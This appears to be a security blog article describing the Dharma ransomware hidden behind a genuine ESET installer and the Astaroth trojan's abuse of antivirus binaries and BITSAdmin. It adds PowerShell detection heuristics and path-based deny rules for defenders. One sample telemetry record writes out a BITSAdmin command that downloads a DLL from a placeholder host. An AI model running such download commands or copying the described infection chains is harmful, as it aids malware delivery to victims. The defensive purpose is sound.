Attackers have found a new cover in antivirus software. Since the beginning of the year, a number of cases have surfaced that point to a growing trend: attackers using legitimate antivirus products to disguise ransomware and trojan infections. The following two cases show how this abuse works in practice.
A new variant of the Dharma ransomware masquerades as an ESET AV Remover installer to trick users and hide its activity. First seen in 2016, Dharma encrypts files with AES-256. The variant, which targets files on the victim's storage devices, was distributed via spam emails urging the recipient to click a link. The link leads to a password-protected download, and the password is supplied in the same email. Once the user enters it, the downloaded file turns out to be a self-extracting archive named Defender[.]exe, which drops two files: taskhost[.]exe, the malicious Dharma payload, and Defender_nt32_enu[.]exe, an old, renamed copy of the genuine ESET AV Remover installer. Because the ESET installer itself is unmodified, initial scanning flags nothing, and it serves only to divert attention while the ransomware encrypts files on the victim's device.
Once the ESET AV Remover installation begins, the ransomware starts encrypting in the background, using the ESET GUI on screen to keep the user occupied. The ransomware runs as a separate process from the AV Remover, so it still executes even if the remover is never launched; the installer exists purely to make the activity look legitimate.
In spring 2019, the infamous Astaroth trojan started to abuse antivirus solutions to hide its activity and to download additional modules. Researchers analysed a new campaign targeting countries in South America and Europe and found that the adversaries had worked out how to abuse security products that are popular in those regions.
Earlier versions of Astaroth scanned the system for those security solutions and, if any were present, removed themselves. The newer variant does the opposite: it misuses a legitimate '.exe' belonging to one of those products to download and load additional malicious modules, so the malicious code runs under cover of a trusted, signed binary.
The adversaries spread the malware via spam emails carrying a 7-Zip archive. The archive contains a .lnk file which runs an XSL script; that script abuses BITSAdmin, the legitimate Windows background-transfer tool, to download and drop the disguised Astaroth trojan. The malware collects and exfiltrates credentials as well as clipboard contents. Researchers believe the attackers' objective is to harvest banking information and steal funds from victims' accounts. Because the malware also collects passwords, the stolen credentials can equally be used to infiltrate an organisation's network, exfiltrate sensitive information, or install ransomware.
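The two infection chains above leave traits a defender can look for in process-creation telemetry: a Windows system binary name (taskhost.exe) launched from a user-writable directory by a self-extracting archive, and bitsadmin.exe performing a /transfer on behalf of a script host. The PowerShell below is an added illustration, not code from the article or from the vendor reports it summarises; it applies those heuristics to constructed Sysmon-style process-creation records. The records, paths, the fixed system root and the lists of binary names are assumptions made for the demonstration.

```powershell
# Added example: heuristics for the two infection chains described in the
# article, applied to constructed process-creation records. Field names follow
# Sysmon Event ID 1; the records themselves are made up for this demonstration.

$systemRoot = 'C:\Windows'   # assumption: standard install; use $env:SystemRoot on a live host

# Constructed sample records: a benign taskhost, the Dharma-style drop, the decoy
# ESET installer, an Astaroth-style BITSAdmin download, and benign bitsadmin use.
$records = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\taskhost.exe'
                       ParentImage = 'C:\Windows\System32\services.exe'
                       CommandLine = 'taskhost.exe' },
    [pscustomobject]@{ Image = 'C:\Users\alice\AppData\Local\Temp\taskhost.exe'
                       ParentImage = 'C:\Users\alice\Downloads\Defender.exe'
                       CommandLine = 'taskhost.exe' },
    [pscustomobject]@{ Image = 'C:\Users\alice\AppData\Local\Temp\Defender_nt32_enu.exe'
                       ParentImage = 'C:\Users\alice\Downloads\Defender.exe'
                       CommandLine = 'Defender_nt32_enu.exe' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\bitsadmin.exe'
                       ParentImage = 'C:\Windows\System32\wscript.exe'
                       CommandLine = 'bitsadmin /transfer job /download /priority high http://example.invalid/m.dll C:\Users\Public\m.dll' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\bitsadmin.exe'
                       ParentImage = 'C:\Windows\System32\svchost.exe'
                       CommandLine = 'bitsadmin /list' }
)

function Test-SuspiciousProcess {
    param([Parameter(Mandatory)] $Record)

    $reasons    = @()
    $name       = [System.IO.Path]::GetFileName($Record.Image)
    $parentName = [System.IO.Path]::GetFileName($Record.ParentImage)

    # Rule 1: a well-known Windows binary name running from outside %SystemRoot%
    # (the Dharma payload borrowed the name taskhost.exe).
    $systemNames = 'taskhost.exe', 'taskhostw.exe', 'svchost.exe', 'lsass.exe', 'csrss.exe'
    if ($systemNames -contains $name -and $Record.Image -notlike "$systemRoot\*") {
        $reasons += "'$name' launched from outside $systemRoot"
    }

    # Rule 2: anything executed from a user-writable staging directory, which is
    # where self-extracting archives and mail clients unpack attachments.
    $stagingPatterns = '*\AppData\Local\*', '*\AppData\Roaming\*', 'C:\Users\Public\*', '*\Downloads\*'
    foreach ($pattern in $stagingPatterns) {
        if ($Record.Image -like $pattern) { $reasons += "image under $pattern"; break }
    }

    # Rule 3: bitsadmin /transfer spawned by a script host or shell (the
    # .lnk -> script -> BITSAdmin chain). A bare 'bitsadmin /list' from a
    # service host does not match.
    $scriptHosts = 'wscript.exe', 'cscript.exe', 'cmd.exe', 'powershell.exe', 'mshta.exe', 'wmic.exe'
    if ($name -eq 'bitsadmin.exe' -and
        $Record.CommandLine -match '/transfer' -and
        $scriptHosts -contains $parentName) {
        $reasons += "bitsadmin /transfer spawned by $parentName"
    }

    [pscustomobject]@{
        Image      = $Record.Image
        Suspicious = ($reasons.Count -gt 0)
        Reasons    = ($reasons -join '; ')
    }
}

# Run the heuristics and show only the records that tripped at least one rule.
$records | ForEach-Object { Test-SuspiciousProcess $_ } | Where-Object Suspicious | Format-Table -AutoSize
```

On the constructed records this flags the Temp-dwelling taskhost.exe (rules 1 and 2), the renamed ESET installer (rule 2) and the script-host-spawned BITS transfer (rule 3), while the genuine taskhost.exe and the svchost-spawned `bitsadmin /list` pass. Rule 2 on its own is noisy in real environments, since several mainstream applications install per-user under %LOCALAPPDATA%; treat it as a triage signal and exclude known signed publishers rather than alerting on every hit.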
What could have been done in such situations?
- Periodic cyber security and awareness training
Attackers keep coming up with newer and more advanced ways to deliver their payloads; in both cases above the initial foothold was a user opening a link or attachment from a spam email. It is therefore essential to equip employees to recognise such lures, which is best achieved through periodic cyber security and awareness training that uses current, realistic examples.
- Patch Management
Patch operating systems, software and firmware on all devices. A centralised patch management system helps ensure that known vulnerabilities are closed before they can be exploited.
- Limit Administrative Access
Restricting administrative rights limits what a payload can do once a user launches it. In both cases above the malware was started by the user who opened the email, so it runs with that user's privileges; without administrative rights it cannot change system-wide security settings or services, and a stolen standard-user credential is worth far less to an attacker than an administrator's.
- Policy Implementation
Implement Software Restriction Policies (or their successors, AppLocker and Windows Defender Application Control) to block executables from running out of the locations ransomware typically stages in: the temporary folders used by compression/decompression programs and self-extracting archives, and the AppData/LocalAppData folders under each user profile. Both payloads above were dropped into exactly such user-writable directories.
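As an added example (not part of the original article), the following PowerShell writes a path-based Software Restriction Policy to the local registry that denies execution from %LOCALAPPDATA%, %APPDATA%, %TEMP% and the scratch folders that WinRAR, 7-Zip, WinZip and self-extracting archives unpack into. The key layout is the one the Local Security Policy editor uses under Safer\CodeIdentifiers; the log file path, the rule description text and the specific archiver scratch-folder patterns are assumptions. Run it elevated on a test machine.

```powershell
# Added example: path-based Software Restriction Policy written to the local
# registry. In a domain, deploy the same rules through a GPO instead, since
# domain policy overrides local settings.
$base       = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers'
$disallowed = "$base\0\Paths"        # security level 0 = Disallowed (262144 = Unrestricted)

# Deny patterns: AppData/LocalAppData, %TEMP%, and the scratch directories that
# archivers and self-extracting archives unpack into (assumed conventional names).
$denyPatterns = @(
    '%LOCALAPPDATA%\*.exe', '%LOCALAPPDATA%\*\*.exe',
    '%APPDATA%\*.exe',      '%APPDATA%\*\*.exe',
    '%TEMP%\*.exe',         '%TEMP%\*\*.exe',
    '%TEMP%\Rar*\*.exe',    '%TEMP%\7z*\*.exe',
    '%TEMP%\wz*\*.exe',     '%TEMP%\*.zip\*.exe'
)

# Policy-wide settings: default level Unrestricted, so only the deny rules bite.
New-Item -Path $base -Force | Out-Null
Set-ItemProperty -Path $base -Name DefaultLevel        -Value 262144 -Type DWord
Set-ItemProperty -Path $base -Name TransparentEnabled  -Value 1      -Type DWord   # executables only; 2 would also cover DLLs
Set-ItemProperty -Path $base -Name PolicyScope         -Value 0      -Type DWord   # all users, administrators included
Set-ItemProperty -Path $base -Name AuthenticodeEnabled -Value 0      -Type DWord
Set-ItemProperty -Path $base -Name ExecutableTypes -Type MultiString -Value @(
    'ADE','ADP','BAS','BAT','CHM','CMD','COM','CPL','CRT','EXE','HLP','HTA','INF',
    'INS','ISP','LNK','MDB','MDE','MSC','MSI','MSP','MST','OCX','PCD','PIF','REG',
    'SCR','SHS','URL','VB','WSC')
# Assumed log location. SRP appends one line per evaluated program here, which
# is the easiest way to spot legitimate per-user installers before enforcing.
Set-ItemProperty -Path $base -Name LogFileName -Value 'C:\Windows\Temp\srp.log' -Type String

# One Disallowed path rule per pattern, each in its own GUID-named subkey.
New-Item -Path $disallowed -Force | Out-Null
foreach ($pattern in $denyPatterns) {
    $ruleKey = Join-Path $disallowed ([guid]::NewGuid().ToString('B'))
    New-Item -Path $ruleKey -Force | Out-Null
    Set-ItemProperty -Path $ruleKey -Name ItemData     -Value $pattern -Type ExpandString
    Set-ItemProperty -Path $ruleKey -Name SaferFlags   -Value 0        -Type DWord
    Set-ItemProperty -Path $ruleKey -Name Description  -Value 'Deny execution from user-writable location' -Type String
    Set-ItemProperty -Path $ruleKey -Name LastModified -Value ([datetime]::UtcNow.ToFileTimeUtc()) -Type QWord
}

# Verify: list the Disallowed path rules now present in the registry.
Get-ChildItem -Path $disallowed | ForEach-Object { (Get-ItemProperty -Path $_.PSPath).ItemData }
```

Two caveats a practitioner will want. First, several mainstream applications install per-user under %LOCALAPPDATA%, so review the log on a pilot group and add Unrestricted (level 262144) path or hash rules for them before rolling the deny rules out. Second, a path rule is a speed bump, not a boundary: anything that can write to a location outside the patterns still runs, and a user can be talked into copying a file elsewhere, which is why Microsoft now steers new deployments toward AppLocker or Windows Defender Application Control with publisher-based allow-listing.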
Security habits of this kind need to be built into the organisation's routine. It is often claimed that around 90% of cyber-attacks involve employee negligence; whatever the exact figure, both cases above began with a user opening a link or attachment. Cyber security companies such as Kratikal help organisations achieve this objective with state-of-the-art cyber security products and services.